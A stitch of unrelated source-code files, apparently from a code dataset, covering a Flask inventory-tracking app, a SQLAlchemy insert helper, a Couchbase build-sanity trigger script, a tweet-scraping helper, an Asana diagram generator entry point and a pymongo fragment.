return redirect(url_for("main.products"))
@bp.route("/")
def root():
return redirect(url_for("main.products"))
@bp.route("/products", methods=("GET", "POST"))
@login_required
def products():
""" The product route. """
db = get_db() # Get the database connection.
b_id = session.get("user_id")
error = None
# Request to add/update a product to the product table.
if request.method == "POST":
if "submit_product" in request.form:
try:
prod_id = request.form["insert_product_id"]
prod_name = request.form["insert_product_name"]
prod_qty = int(request.form["insert_product_qty"])
if prod_qty < 0:
raise Exception("Invalid quantity.")
db.execute(
"INSERT INTO product (product_id, product_name, quantity, for_business) values (?, ?, ?, ?)",
(prod_id, prod_name, prod_qty, b_id,),
)
db.commit()
except Exception as e:
if "UNIQUE constraint failed" in str(e):
error = "Error adding product: A product with that ID already exists or has been created before."
elif "invalid literal for int() with base 10:" in str(e):
error = "Invalid quantity."
else:
error = str(e)
return render_template(
"products.html",
title="Products",
products=product_list(b_id),
error=error,
)
if "update_product" in request.form:
try:
prod_selected = request.form["select_product"].split(",")[0]
prod_name = request.form["update_product_name"]
prod_qty = int(request.form["update_product_qty"])
if prod_name:
query = "UPDATE product SET product_name = ? WHERE product_id = ?"
db.execute(query, (prod_name, prod_selected))
db.commit()
balance_quantity(
prod_qty, prod_selected, location="product_factory",
)
db.commit()
except Exception as e:
if "invalid literal for int() with base 10:" in str(e):
error = "Invalid quantity."
else:
error = str(e)
return render_template(
"products.html",
title="Products",
products=product_list(b_id),
error=error,
)
else:
pass
# Retrieve and display products on the page.
prod_list = product_list(b_id)
return render_template(
"products.html", products=prod_list, title="Products", error=error
)
@bp.route("/<lid>/deleteloc", methods=("GET",))
def delete_loc(lid):
""" Used by the location page to delete a location. Also deletes any products at that location. """
db = get_db()
b_id = session.get("user_id")
db.execute(
"DELETE FROM location WHERE location_id = ? AND for_business = ?", (lid, b_id,)
)
db.commit()
db.execute("DELETE FROM warehouse WHERE loc_id = ? AND b_id = ?", (lid, b_id,))
db.commit()
return redirect(url_for("main.locations"))
@bp.route("/locations", methods=("GET", "POST"))
@login_required
def locations():
""" The location route. """
db = get_db() # Get the database connection
b_id = session.get("user_id")
error = None
# Request to add a location to the location table.
if request.method == "POST":
if "submit_location" in request.form:
try:
loc_id = request.form["insert_location_id"]
loc_name = request.form["insert_location_name"]
db.execute(
"INSERT INTO location (location_id, location_name, for_business) values(?, ?, ?)",
(loc_id, loc_name, b_id,),
)
db.commit()
except Exception as e:
if "UNIQUE constraint failed:" in str(e):
error = "Location with that ID already exists."
else:
error = str(e)
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html",
title="Locations",
locations=location_list,
error=error,
)
if "update_location" in request.form:
try:
loc_selected = request.form["select-location"].split(",")[0]
new_locname = request.form["location-name-update"]
db.execute(
"UPDATE location SET location_name = ? WHERE location_id = ?",
(new_locname, loc_selected,),
)
db.commit()
except Exception as e:
error = str(e)
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html",
title="Locations",
locations=location_list,
error=error,
)
else:
pass
# Retrieve locations and render the page.
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html", title="Locations", locations=location_list, error=error
)
def check_warehouse():
    """ Returns a list of location IDs which has products stored """
    db = get_db()
    b_id = session.get("user_id")
    query = "SELECT loc_id FROM warehouse where b_id = ?"
    warehouses = db.execute(query, (b_id,)).fetchall()
    # dict.fromkeys de-duplicates while preserving first-seen order in O(n),
    # replacing the previous O(n^2) `not in list` membership loop.
    return list(dict.fromkeys(row[0] for row in warehouses))
@bp.route("/_loadproducts/<lid>", methods=("GET",))
def loadproducts(lid):
""" Used by the movement page to retrieve products at a particular location. """
db = get_db()
b_id = session.get("user_id")
product_list = {}
if lid == "Products":
query = "SELECT product_id, product_name FROM product WHERE for_business = ? AND quantity > 0"
warehouses = db.execute(query, (b_id,)).fetchall()
for products in warehouses:
product_list[products[0]] = products[1]
else:
query = "SELECT prod_id FROM warehouse where loc_id = ? AND b_id = ?"
warehouses = db.execute(query, (lid, b_id,)).fetchall()
for products in warehouses:
product_name = db.execute(
"SELECT product_name FROM product WHERE product_id = ? AND for_business = ?",
(products["prod_id"], b_id,),
).fetchone()
product_list[products["prod_id"]] = product_name["product_name"]
return jsonify(product_list)
@bp.route("/_getquantity/<prd>/<loc>", methods=("GET",))
def getquantity(prd, loc):
""" Used by the movement page to get the quantity of a product."""
db = get_db()
b_id = session.get("user_id")
qty = {}
if loc == "Products":
if prd != "None":
q = db.execute(
"SELECT quantity FROM product WHERE product_id = ? AND for_business = ?",
(prd, b_id,),
).fetchone()
qty["qty"] = str(q["quantity"])
else:
pass
else:
q = db.execute(
"SELECT qty FROM warehouse WHERE prod_id = ? AND b_id = ? AND loc_id = ?",
(prd, b_id, loc,),
).fetchone()
qty["qty"] = str(q["qty"])
return qty
def products_at_locations():
    """ Creates a dictionary with loc IDs as keys and products stored there as values """
    # Shape: {location_name: [["<prod_id> <prod_name>", qty], ...]} -- note
    # the keys are location *names*, not IDs, despite the docstring above.
    db = get_db()
    b_id = session.get("user_id")
    locs = check_warehouse()
    warehouse = {}
    for ids in locs:
        l = []
        prods = db.execute(
            "SELECT prod_id, qty FROM warehouse where b_id = ? AND loc_id = ?",
            (b_id, ids,),
        ).fetchall()
        locname = db.execute(
            "SELECT location_name FROM location WHERE location_id = ? AND for_business = ?",
            (ids, b_id,),
        ).fetchone()["location_name"]
        for data in prods:
            prodname = db.execute(
                "SELECT product_name FROM product WHERE for_business = ? AND product_id = ?",
                (b_id, data["prod_id"],),
            ).fetchone()["product_name"]
            l.append([data["prod_id"] + " " + prodname, data["qty"]])
        warehouse[locname] = l
    return warehouse
def logmovements(
    movement_id, from_location, to_location, prod_id, qty,
):
    # Record one stock movement in the movement audit table.
    db = get_db()
    b_id = session.get("user_id")
    # NOTE(review): the next assignment is a no-op -- possibly "P" (the code
    # used for the factory in movement IDs) was intended; confirm before changing.
    if from_location == "Products":
        from_location = "Products"
    if to_location == "Move out":
        # Stored as the short code "MO", matching the movement-id suffix.
        to_location = "MO"
    db.execute(
        "INSERT INTO movement (movement_id, from_location, to_location, prod_id, qty, b_id)"
        "VALUES (?, ?, ?, ?, ?, ?)",
        (movement_id, from_location, to_location, prod_id, qty, b_id,),
    )
    db.commit()
@bp.route("/movement", methods=("GET", "POST",))
@login_required
def movements():
""" Movement route. """
db = get_db()
b_id = session.get("user_id")
error = None
if request.method == "POST":
# movement request - move product to a location
try:
move_from = request.form["select-location"].split(",")[0]
product_id = request.form["choose-product"].split(",")[0]
quantity = int(request.form["quantity"])
move_to = request.form["move-to"].split(",")[0]
if quantity < 0:
raise Exception("Invalid quantity.")
if move_from == "Products":
moveid = "P-"
product_array = get_product("product_factory", product_id, quantity)
else:
moveid = move_from + "-"
product_array = get_product(move_from, product_id, quantity)
set_product(move_to, product_array)
if move_to == "Move out":
moveid += "MO"
else:
moveid += move_to
logmovements(moveid, move_from, move_to, product_id, quantity)
prod_list = product_list(b_id)
move_to = db.execute(
"SELECT location_id, location_name FROM location WHERE for_business = ?",
(b_id,),
).fetchall()
warehouses = check_warehouse()
movefrom_list = []
for lids in warehouses:
query = "SELECT location_id, location_name FROM location where location_id = ?"
l_list = db.execute(query, (lids,)).fetchone()
movefrom_list.append(l_list)
locations_with_products = products_at_locations()
return render_template(
"movement.html",
title="Movement",
movefrom=movefrom_list,
products=prod_list,
moveto=move_to,
locationmap=locations_with_products,
error=error,
)
except Exception as e:
if "'NoneType' object is not subscriptable" in str(e):
error = "Error moving: Invalid product."
else:
error = "Error moving: " + str(e)
# Retrieve products from the products table
prod_list = product_list(b_id)
# Retrieve all locations
move_to = db.execute(
"SELECT location_id, location_name FROM location WHERE for_business = ?",
(b_id,),
).fetchall()
# Get all locations which have products stored.
warehouses = check_warehouse()
# Creates a list of those locations along with their names.
movefrom_list = []
for lids in warehouses:
query = "SELECT location_id, location_name FROM location where location_id = ?"
l_list = db.execute(query, (lids,)).fetchone()
movefrom_list.append(l_list)
locations_with_products = products_at_locations()
return render_template(
"movement.html",
title="Movement",
movefrom=movefrom_list,
products=prod_list,
moveto=move_to,
locationmap=locations_with_products,
error=error,
)
@bp.route("/movementlogs", methods=("GET", "POST",))
@login_required
def movementlogs():
""" Movement logs route. """
db = get_db()
b_id = session.get("user_id")
logtable = db.execute("SELECT * FROM movement WHERE b_id = ?", (b_id,)).fetchall()
business_name = db.execute(
"SELECT business_name FROM business WHERE business_id = ?", (b_id,)
).fetchone()
return render_template(
"movementlogs.html",
logtable=logtable,
business_name=business_name,
title="Logs",
)
@bp.route("/logout")
def logout():
session.clear()
return redirect(url_for("start.index"))
|
19,263 | ff002c4f0044a78a5dcc1f0684bfdff0adff889b | from sqlalchemy.orm import sessionmaker
from db_interface.get_metadata import Metadata
from sqlalchemy import exc
from exceptions.insert_error import InsertError
class InsertData:
    """Insert a single row, supplied as a dict, into a table via the ORM."""

    def __init__(self, database, table, data, orm_class, test_env):
        """Bind a session factory for *table* and remember the row data.

        `database` is accepted for interface compatibility; the engine is
        resolved from the table name and environment by Metadata.
        """
        engine = Metadata(test_env=test_env, table_name=table)
        engine.make_engine()
        self.session = sessionmaker(bind=engine.engine)
        self.data = data
        self.orm_class = orm_class

    def insert(self):
        """Insert self.data as a new self.orm_class row.

        Returns "Data inserted" on success; rolls back and raises
        InsertError on any failure. The session is always closed.
        """
        session = self.session()
        orm = self.orm_class()
        # Use setattr, not __dict__ assignment: SQLAlchemy's instrumented
        # attributes only track values set through normal attribute access,
        # so writing to __dict__ bypasses the ORM's change tracking.
        for key, value in self.data.items():
            setattr(orm, key, value)
        try:
            print("Insert ORM: {}".format(type(orm)))
            session.add(orm)
            session.commit()
            return "Data inserted"
        except Exception as error:
            session.rollback()
            raise InsertError(error)
        finally:
            # Previously the session leaked on both success and failure.
            session.close()
|
19,264 | 5d721c9e70556c404c9c46d70c7a2bb6b0dad7f9 | from jigsaw import JigsawPlugin
class Plugin(JigsawPlugin):
    """Minimal jigsaw plugin: inherits all behaviour from JigsawPlugin."""
    pass
|
19,265 | 3a3e2fb902d7f5c7799868569b4fe184a1807f21 | #!/usr/bin/env python3
import argparse
import glob
import json
import os
# Output: .properties file for triggering build_sanity_matrix
# (if .properties file is absent, no need to trigger)
# Properties:
# CURRENT_BUILD_NUMBER (the build number for which to run sanity)
# VERSION
# DISTROS - whitespace-separated list of platforms (debian8, ubuntu14.04...)
# TESTRUNNER_BRANCH - branch of testrunner to use
# QQQ The set of platforms for a given release should come from a
# canonical location, such as the product-metadata repository.
# For now we keep the version-specific platform lists here.
# For now these 'platform' keys are the letters in the installer filenames.
# The boolean value is whether that platform is passed on to
# build_sanity_matrix (ie, put into the .properties file).
VERSION_DATA = {
"4.6.5": {
"platforms": {
"centos6": False,
"centos7": True,
"debian7": True,
"debian8": True,
"macos": False,
"suse11": True,
"ubuntu12": True,
"ubuntu14": False,
"windows": True,
},
"testrunner_branch": "watson",
},
"5.0.1": {
"platforms": {
"centos6": False,
"centos7": True,
"debian7": False,
"debian8": True,
"macos": False,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "spock",
},
"5.1.0": {
"platforms": {
"centos6": False,
"centos7": True,
"debian7": False,
"debian8": True,
"debian9": False,
"macos": False,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "spock",
},
"5.1.1": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "spock",
},
"5.1.2": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "spock",
},
"5.1.3": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "spock",
},
"5.5.0": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.1": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.2": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.3": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.4": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.5": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.6": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.7": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.8": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"5.5.9": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "vulcan",
},
"6.0.0": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu14": False,
"ubuntu16": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.1": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": False,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.2": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.3": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.4": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.5": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.6": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.0.7": {
"platforms": {
"centos6": False,
"centos7": True,
"debian8": True,
"debian9": False,
"macos": True,
"oel7": True,
"suse11": True,
"suse12": False,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "alice",
},
"6.5.0": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "6.5.x",
},
"6.5.1": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "6.5.x",
},
"6.5.2": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "6.5.x",
},
"6.6.0": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"6.6.1": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"6.6.2": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"6.6.3": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"6.6.4": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"6.6.5": {
"platforms": {
"centos7": True,
"centos8": False,
"debian8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "mad-hatter",
},
"7.0.0": {
"platforms": {
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "cheshire-cat",
},
"7.0.1": {
"platforms": {
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "cheshire-cat",
},
"7.0.2": {
"platforms": {
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": False,
"macos": True,
"oel7": False,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "cheshire-cat",
},
"7.0.3": {
"platforms": {
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "cheshire-cat",
},
"7.0.4": {
"platforms": {
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "cheshire-cat",
},
"7.1.0": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.1.1": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.1.2": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.1.3": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.1.4": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.1.5": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.2.0": {
"platforms": {
"amzn2": True,
"centos7": True,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": True,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.2.1": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.2.2": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "neo",
},
"7.5.0": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "master",
},
"7.6.0": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "master",
},
"8.0.0": {
"platforms": {
"amzn2": True,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "master",
},
"0.0.0": {
"platforms": {
"amzn2": False,
"centos7": False,
"centos8": False,
"debian9": False,
"debian10": True,
"macos": True,
"oel8": True,
"suse12": True,
"ubuntu18": False,
"windows": True,
},
"testrunner_branch": "master",
},
}
# Global record of the last sanity-tested build per product/version.
LAST_SANITY_FILENAME = "/latestbuilds/last-sanity.json"
# Properties file consumed by the build_sanity_matrix trigger job.
TRIGGER_PROPERTIES_FILENAME = "build-sanity-trigger.properties"
class SanityTrigger:
    """
    Locates, for a given product and version, the most recent build whose
    installers are all present under /latestbuilds, and records which
    build was last submitted for sanity testing.
    """
    def __init__(self, product, version):
        # A version such as "7.2.0-MAGMA" selects the magma storage
        # backend; strip the suffix to recover the plain version number.
        self.use_magma = "MAGMA" in version
        self.version = version.split('-')[0] if self.use_magma else version
        self.product = product
        self.ver_dir = os.path.join(
            "/latestbuilds", product, "zz-versions", self.version
        )
        ver_info = VERSION_DATA[self.version]
        self.plats = ver_info["platforms"]
        self.testrunner_branch = ver_info["testrunner_branch"]
        self.bld_num = 0
        self.last_bld = 0
    def get_last_sanity(self):
        """
        Load the global last-sanity JSON file and remember the last
        sanity-checked build number for this product/version in
        self.last_bld.  Returns 0 when the file, the product, or the
        version cannot be found.
        """
        # QQQ in future, get/set_last_sanity() should be replaced with
        # equivalent functions backed by the build database
        self.sanity = {}
        if os.path.exists(LAST_SANITY_FILENAME):
            with open(LAST_SANITY_FILENAME) as handle:
                self.sanity = json.load(handle)
            per_version = self.sanity.get(self.product, {})
            if self.version in per_version:
                self.last_bld = per_version[self.version]
        return self.last_bld
    def set_last_sanity(self, bld_num):
        """
        Record *bld_num* as the last sanity-checked build for the current
        product/version in the global JSON file, creating the file and
        intermediate entries as needed.  Expects get_last_sanity() to
        have initialized self.sanity.
        """
        self.sanity.setdefault(self.product, {})
        self.bld_num = bld_num
        self.sanity[self.product][self.version] = bld_num
        with open(LAST_SANITY_FILENAME, "w") as handle:
            json.dump(self.sanity, handle, indent=4,
                      sort_keys=True, separators=(',', ': '))
    def check_build(self, bld_num):
        """
        Return True when an installer exists for every enabled platform
        of the given build number.
        """
        # QQQ In future this should be replaced with a query to the
        # build database
        bld_dir = os.path.join(self.ver_dir, str(bld_num))
        for plat, enabled in self.plats.items():
            if not enabled:
                continue
            # QQQ Assumes format of filename unique to couchbase-server
            pattern = "{}/couchbase-server-enterprise?{}*{}*".format(
                bld_dir, self.version, plat
            )
            installers = [
                f for f in glob.glob(pattern)
                if not (f.endswith(".md5") or f.endswith(".sha256"))
            ]
            if not installers:
                print ("Platform {} is missing".format(plat))
                return False
        return True
    def get_latest_build(self):
        """
        Walk latestbuilds for the newest complete build newer than
        self.last_bld; return its number, or self.last_bld when nothing
        newer is complete.
        """
        # Start from the last sanity-checked build number (may be 0).
        self.get_last_sanity()
        # The build directory is shared by every version of a release,
        # so restrict to numeric entries above the last checked build.
        # Entries of 50000 and above are toy builds and are ignored.
        candidates = sorted(
            int(entry) for entry in os.listdir(self.ver_dir)
            if entry.isdigit() and self.last_bld < int(entry) < 50000
        )
        bld_num = self.last_bld
        for candidate in candidates:
            print ("Checking build " + str(candidate))
            if self.check_build(candidate):
                bld_num = candidate
                print("bld_num is now " + str(bld_num))
        return bld_num
    def write_properties(self, prop_filename):
        """
        Write the build-sanity-trigger.properties file consumed by the
        build-sanity job.
        """
        # build-sanity expects "win64" rather than "windows".
        distros = [
            "win64" if plat == "windows" else plat
            for plat, enabled in self.plats.items() if enabled
        ]
        with open(prop_filename, "w") as prop:
            prop.write("CURRENT_BUILD_NUMBER={}\n".format(self.bld_num))
            prop.write("VERSION={}\n".format(self.version))
            prop.write("DISTROS={}\n".format(" ".join(distros)))
            prop.write("TESTRUNNER_BRANCH={}\n".format(self.testrunner_branch))
            if self.use_magma:
                prop.write("EXTRA_TEST_PARAMS={}\n".format("bucket_storage=magma"))
def main():
    """
    Command-line entry point: locate the newest complete build for the
    requested product/version and write a trigger-properties file when
    it is newer than the last sanity-checked build.
    """
    parser = argparse.ArgumentParser(
        description="Find latest successful build for given product/version"
    )
    parser.add_argument('--product', default="couchbase-server",
                        help="Product name")
    parser.add_argument('--version', required=True, help="Version number")
    args = parser.parse_args()
    trigger = SanityTrigger(args.product, args.version)
    last_bld = trigger.get_last_sanity()
    bld_num = trigger.get_latest_build()
    if bld_num <= last_bld:
        # Nothing newer: ensure no stale trigger file is left behind.
        print ("Nothing to do; not writing " + TRIGGER_PROPERTIES_FILENAME)
        if os.path.exists(TRIGGER_PROPERTIES_FILENAME):
            os.unlink(TRIGGER_PROPERTIES_FILENAME)
        return
    print ("Writing " + TRIGGER_PROPERTIES_FILENAME)
    trigger.set_last_sanity(bld_num)
    trigger.write_properties(TRIGGER_PROPERTIES_FILENAME)
if __name__ == '__main__':
    main()
|
19,266 | 8fd893a1b7076aeaf19b7da3a1366a9f69459d4d | import got3 as got
# Ticker symbols of interest; NOTE(review): not referenced anywhere below.
stocks=['AMZN','GOOGL','AAPL','MSFT','NFLX']
def printTweet(descr, t):
    """Print *descr* followed by the main fields of tweet *t*."""
    field_templates = (
        ("Favorite: %s", t.favorites),
        ("Retweets: %d", t.retweets),
        ("Text: %s", t.text),
        ("Date: %s", t.date),
        ("Hashtags: %s\n", t.hashtags),
    )
    print(descr)
    for template, value in field_templates:
        print(template % value)
def show(query, username, date, maxTweets):
    """
    Build a TweetCriteria from the given filters, fetch the matching
    tweets, and print each one.  Any falsy argument skips that filter;
    *date* is a (since, until) pair of date strings.
    """
    criteria = got.manager.TweetCriteria()
    if query:
        criteria.setQuerySearch(query)
    if username:
        criteria.setUsername(username)
    if date:
        criteria.setSince(date[0]).setUntil(date[1])
    if maxTweets:
        criteria.setMaxTweets(maxTweets)
    for tweet in got.manager.TweetManager.getTweets(criteria):
        printTweet("Twitter:", tweet)
# Get tweets by query search
show('$amzn',None,['2017-10-01','2017-10-02'],1000) |
19,267 | 2b8070516685f9631ec00174992941d2f5f70e6e | """
The program start from here
"""
import os
from src.AsanaWrapper import AsanaWrapper
from src.DiagramGenerator import DiagramGenerator
from src.UserStories import UserStories
from src.FileManager import FileManager
from src.dump import dump
def main():
    """
    Fetch the sprint tasks via the Asana wrapper, dump them, build the
    "Terradia" XML tree and render it to SVG.

    @return: 0 on completion
    """
    # ASANA_KEY / TASK come from the environment; presumably set by the
    # caller's deployment — unset values reach AsanaWrapper as None.
    sprint = AsanaWrapper(os.getenv("ASANA_KEY"))
    tasks = sprint.get_sprint_tasks([os.getenv("TASK")])
    generator = DiagramGenerator()
    dump(tasks)
    generator.create_xml_tree("Terradia", tasks)
    FileManager().generate_svg_from_xml()
    return 0
if __name__ == '__main__':
    main()
|
19,268 | 2c020ae6e02d97715d31a74edb4567c06c4fcca1 | import pymongo
from collections import Counter

client = pymongo.MongoClient(host="192.168.1.106", port=27017)
# Collections used by the commented-out person-id consistency pass below.
col_nlp_extract_base_check_person1 = client["earth_gis_temp"]["nlp_extract_base_check_person1"]
col_history_proofreading_base = client["earth_gis_temp"]["history_proofreading_base_copy"]
# id_list = []
# for x in col_history_proofreading_base.find():
#     if x["person_id"] not in id_list:
#         id_list.append(x["person_id"])
#
#     else:
